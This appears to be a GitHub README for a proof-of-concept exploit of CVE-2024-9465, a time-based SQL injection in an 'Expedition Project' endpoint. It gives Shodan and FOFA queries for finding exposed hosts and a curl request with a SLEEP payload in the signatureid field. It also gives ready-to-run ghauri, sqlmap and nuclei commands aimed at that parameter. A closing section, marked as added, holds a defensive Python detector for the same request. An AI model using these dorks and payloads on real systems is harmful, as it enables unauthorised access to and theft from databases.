Checkpoint SQL Injection via Time-Based Attack (CVE-2024-9465)

mustafaakalin/CVE-2024-9465

CVE-2024-9465

SHODAN SEARCH

https://www.shodan.io/search?query=html%3A%22Expedition+Project%22

html:"Expedition Project"

FOFA SEARCH

https://en.fofa.info/
body="Expedition Project" || title="Expedition Project"

USAGE

python3 CVE-2024-9465.py -u https://domain.com

cURL command

curl -X POST "https://domain.com/bin/configurations/parsers/Checkpoint/CHECKPOINT.php" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "action=import&type=test&project=pandbRBAC&signatureid=1+AND+(SELECT+1234+FROM+(SELECT(SLEEP(10)))horizon3)" \
-w "Total Time: %{time_total}\n" \
-k

Ghauri Command

ghauri --url "https://domain.com/bin/configurations/parsers/Checkpoint/CHECKPOINT.php" \
--data "action=import&type=test&project=pandbRBAC&signatureid=1" \
--technique T \
--dbms mysql \
--time-sec 10 \
-p signatureid \
--threads 10 

SQLMAP command

sqlmap -u "https://domain.com/bin/configurations/parsers/Checkpoint/CHECKPOINT.php" \
--data "action=import&type=test&project=pandbRBAC&signatureid=1" \
--dbms=mysql \
--level 5 --risk 3 \
--time-sec=10 \
--technique=T \
--tamper=space2comment \
--batch --random-agent -v 3

Nuclei command

nuclei -u https://domain.com -t CVE-2024-9465.yaml -v
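
Detection example

A defender-side check for the request shown in the cURL command above, added here as an example and not part of this repository: it flags POSTs to the CHECKPOINT.php endpoint whose signatureid is not a plain integer or carries a MySQL delay function. It assumes a reverse proxy or WAF log that records method, path, form body and response time; the record layout and the names inspect_request and SAMPLE are hypothetical.

```python
import re
from urllib.parse import parse_qs

# Endpoint and parameter taken from the requests shown on this page.
ENDPOINT = "/bin/configurations/parsers/Checkpoint/CHECKPOINT.php"
PARAM = "signatureid"
INT_RE = re.compile(r"[0-9]+")
# MySQL delay primitives used by time-based probes.
DELAY_RE = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)
# Inline comments are what sqlmap's space2comment tamper puts in place of spaces.
COMMENT_RE = re.compile(r"/\*.*?\*/", re.DOTALL)

# Constructed sample records: (method, path, body, duration in seconds).
SAMPLE = [
    ("POST", ENDPOINT, "action=import&type=test&project=pandbRBAC&signatureid=1", 0.08),
    ("POST", ENDPOINT, "action=import&type=test&project=pandbRBAC&signatureid=1+AND+(SELECT+1234+FROM+(SELECT(SLEEP(10)))horizon3)", 10.21),
    ("GET", "/index.php", "", 0.03),
]


def inspect_request(method, path, body, duration_s, slow_after=5.0):
    """Return a list of findings for one logged request (empty list = clean)."""
    if method.upper() != "POST" or path.split("?", 1)[0] != ENDPOINT:
        return []
    findings = []
    # parse_qs decodes %XX escapes and turns '+' into a space.
    for value in parse_qs(body, keep_blank_values=True).get(PARAM, []):
        if not INT_RE.fullmatch(value):
            findings.append("non-numeric signatureid")
        # Collapse /**/ comments so "SLEEP/**/(10)" is still recognised.
        if DELAY_RE.search(COMMENT_RE.sub(" ", value)):
            findings.append("time-delay function in signatureid")
    # A slow response only matters when the parameter already looks wrong.
    if findings and duration_s >= slow_after:
        findings.append("slow response (%.1fs)" % duration_s)
    return findings


if __name__ == "__main__":
    for rec in SAMPLE:
        print(rec[0], rec[1], inspect_request(*rec))
```

The integer check is the stronger signal, since a legitimate signatureid has no reason to contain anything but digits; the keyword and timing checks only add context for triage.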
